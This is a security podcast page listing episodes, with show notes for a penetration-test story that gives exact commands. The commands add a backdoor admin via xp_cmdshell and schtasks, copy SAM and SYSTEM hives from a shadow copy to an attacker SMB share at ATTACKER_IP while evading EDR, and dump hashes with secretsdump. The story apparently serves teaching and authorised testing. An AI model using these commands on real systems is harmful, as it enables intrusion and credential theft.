7 Minute Security

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

7MS #701: What I’m Working on This Week – Part 5 11/14/2025

7MS #700: Pretender 11/07/2025

7MS #699: Pre-Travel Security Tips 10/31/2025

7MS #698: Baby’s First ProjectDiscovery 10/24/2025

7MS #697: Pwning Ninja Hacker Academy – Part 4 10/18/2025

7MS #696: Baby's First Security Ticketing System 10/10/2025

7MS #695: Tales of Pentest Pwnage - Part 78 10/03/2025

7MS #694: Tales of Pentest Pwnage – Part 77 09/26/2025

7MS #693: Pwning Ninja Hacker Academy – Part 3 09/19/2025

7MS #692: Tales of Pentest Pwnage – Part 76 09/12/2025

7MS #692: Tales of Pentest Pwnage – Part 76 Happy Friday! Today’s another hot pile of pentest pwnage. To make it easy on myself I’m going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: . I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can’t explain is the first relay got me a shell in the context of NT SERVICE\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\SYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance". Turns out a DA wasn’t interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn’t copy reg hives out of it – EDR was unhappy. In the end, the bizarre combo of things that did the trick was: Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' From the victim system, I did an mklink to the shadow copy: mklink /d C:\tempbackup \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy123\ From command prompt on the victim system, I authenticated to my rogue share: net use \\ATTACKER_IP\share /user:toteslegit DontMindMeLOL! Then I did a copy command for the first hive: copy SYSTEM \\my.attackingip\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!! Finishing move: secretsdump -sam sam.test -system sys.test LOCAL /episode/index/show/7minsec/id/38192630